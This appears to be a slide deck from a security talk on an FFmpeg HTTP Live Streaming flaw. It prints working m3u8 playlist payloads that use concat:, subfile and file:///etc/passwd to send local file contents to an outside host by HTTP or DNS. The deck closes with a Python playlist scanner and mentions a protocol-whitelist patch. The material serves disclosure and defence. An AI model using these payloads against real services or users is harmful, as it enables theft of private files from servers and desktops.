Who are we?
Maxim Andreev (@cdump), software developer, Cloud@Mail.Ru; bug hunter, CTF player
Nikolay Ermishkin (@sl1m), security analyst, Mail.Ru; bug hunter, CTF player, ImageTragick creator

Agenda
Background
How FFmpeg works
HTTP Live Streaming
Exploit 1
Exploit 2 (better version)
...
Exploit N
Conclusion

Background
dozens of video formats
hundreds of video/audio codecs
different bitrates, resolutions, etc.
FFmpeg
How FFmpeg works: user’s view
How FFmpeg REALLY works
Look closer to FFmpeg: extension
Look closer to FFmpeg: .txt
HTTP Live Streaming - HLS
live and on-demand streaming
developed by Apple
supported in FFmpeg
doc: https://developer.apple.com/streaming/

HTTP Live Streaming - HLS
#EXTINF:10.0,
http://cdev.dx.su:1234/8.mp4
#EXT-X-ENDLIST

SSRF: read
#EXT-X-ENDLIST
TXT
FFmpeg: concat
concat - read and seek from many resources in sequence as if they were a unique resource

FFmpeg: concat
header.m3u8 (on the attacker's server) ends with an unterminated URL: http://dx.su?
playlist:
#EXTINF:10.0,
concat:http://dx.su/header.m3u8 file:///etc/passwd
#EXT-X-ENDLIST
Result: HTTP request to http://dx.su?root:x:0:0:root:/root:/usr/bin/zsh (the first line of /etc/passwd is appended to the URL from header.m3u8)

YUV4MPEG2
header.y4m:
YUV4MPEG2 W30 H30 F25:1 Ip A0:0
playlist:
#EXTINF:10.0,
concat:http://dx.su/header.y4m file:///etc/passwd
#EXT-X-ENDLIST
Result: thumbnail.png (the concatenated file bytes become frame data)
5000 800
5000 800 1000
We need better POCs.
http://dx.su/header.m3u8 file:///etc/passwd
#EXT-X-ENDLIST

Exploit cons
Reads first line only
Web server needed to reproduce

Read full file
subfile,,start,34,end,10000,,:/etc/passwd  # read /etc/passwd from the second line

Read full file
concat:http://example.com/header.m3u8 ... #EXT-X-ENDLIST

Read full file (exchange between the attacker's server and the target):
attacker's server -> subfile,,start,0...
target -> root:x:0 (len 33)
attacker's server -> subfile,,start,34...
DEMO
Can you hack Facebook with this?
Forgotten DNS
ffmpeg.yngwie.ru 69.63.185.113  # facebook ISP
Sat Mar 19 2016 08:02:38 GMT-0400 (EDT)

Is it exploitable?
File:
#EXTINF:10.0,
concat:file:///etc/passwd http://ffmpeg.example.com/video.mp4
#EXT-X-ENDLIST

It's cool, but we want to read files.
#EXTINF:10.0,
concat:http://dx.su/header.m3u8 file:///etc/passwd
#EXT-X-ENDLIST

dns header.m3u8: #EXTINF:10.0,http://
dns footer.m3u8: .example.org

We can construct m3u8 from local file.
#EXTINF:10.0,
concat:http://example.org/dns header.m3u8 subfile,,start,0,end,4,,:///etc/passwd http://example.org/dns footer.m3u8
#EXT-X-ENDLIST
We can’t use HTTP to get our m3u8.
We can construct m3u8 from local file.
#EXTINF:10.0,
concat:file:/dns header.m3u8 subfile,,start,0,end,4,,:///etc/passwd file:/dns footer.m3u8
#EXT-X-ENDLIST
But the target system doesn't have our m3u8 files.
Let's build them
So we have an m3u8 inside another m3u8, crafted from chars of known files.
And surprisingly it works:
root.yngwie.ru  # first 4 bytes of /etc/passwd
77.37.251.68
I tried to share my new POC
Oops, I did it again
Is this enough for full service hack?
Exploitation without network support
.txt trick
Error-based
How to check my service?
Tool
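An added example, not the authors' tool: a scanner that flags the concat, subfile and file references shown on the earlier slides so a service can reject such playlists before FFmpeg opens them. The hostnames and sample playlist are constructed; '|' as the concat separator is FFmpeg's own syntax, while splitting on whitespace is an assumption to match how the slides spell the payloads.

```python
import re

# Allowlist of schemes a transcoding service should accept; mirrors the
# protocol-whitelist idea from the conclusion. Everything else is reported.
ALLOWED_SCHEMES = {"http", "https"}
# "http://x" and "file:///x" put ':' after the scheme; FFmpeg's subfile
# syntax "subfile,,start,0,end,4,,:/x" puts ",," after it. Match either.
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)(?::|,,)")
# concat: joins components with '|' (FFmpeg syntax); whitespace is also
# accepted here, an assumption to match the spacing used on the slides.
_CONCAT_SPLIT = re.compile(r"[|\s]+")

def scheme_of(uri: str) -> str:
    """Return the lowercase scheme of a URI, or 'relative' when it has none."""
    m = _SCHEME_RE.match(uri)
    return m.group(1).lower() if m else "relative"

def expand(uri: str):
    """Yield (uri, scheme) for a URI and, recursively, each concat: component."""
    scheme = scheme_of(uri)
    yield uri, scheme
    if scheme == "concat":
        for part in _CONCAT_SPLIT.split(uri[len("concat:"):]):
            if part:
                yield from expand(part)

def scan_playlist(text: str, allowed=ALLOWED_SCHEMES):
    """Return [(line_no, uri, scheme)] for every URI or concat component outside the allowlist."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):  # tags and comments carry no URI
            continue
        for uri, scheme in expand(line):
            if scheme not in allowed and scheme != "relative":  # relative paths pass
                findings.append((line_no, uri, scheme))
    return findings

# Constructed sample: a benign playlist with the talk's two payload shapes spliced in.
SAMPLE_PLAYLIST = """#EXTM3U
#EXTINF:10.0,
http://cdn.example.com/seg1.ts
#EXTINF:10.0,
seg2.ts
#EXTINF:10.0,
concat:http://attacker.example/header.m3u8|file:///etc/passwd
#EXTINF:10.0,
subfile,,start,34,end,10000,,:/etc/passwd
#EXT-X-ENDLIST
"""
```

Rejecting the playlist up front complements running FFmpeg with a protocol whitelist, the fix listed on the results slide.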
My service has no video, should I care about this vulnerability?
ImageMagick
I am a user, not a developer. Am I in danger?
Video files in folder
Ubuntu Linux with FFmpeg
Kali Linux with GStreamer
Results
Attack video converting services
Attack Linux users
Attack with "HACK IT!" button
FFmpeg protocol whitelist patch

Questions?
Maxim Andreev, @cdump, andreevmaxim@gmail.com
Nikolay Ermishkin, @sl1m, nikolay.ermishkin@gmail.com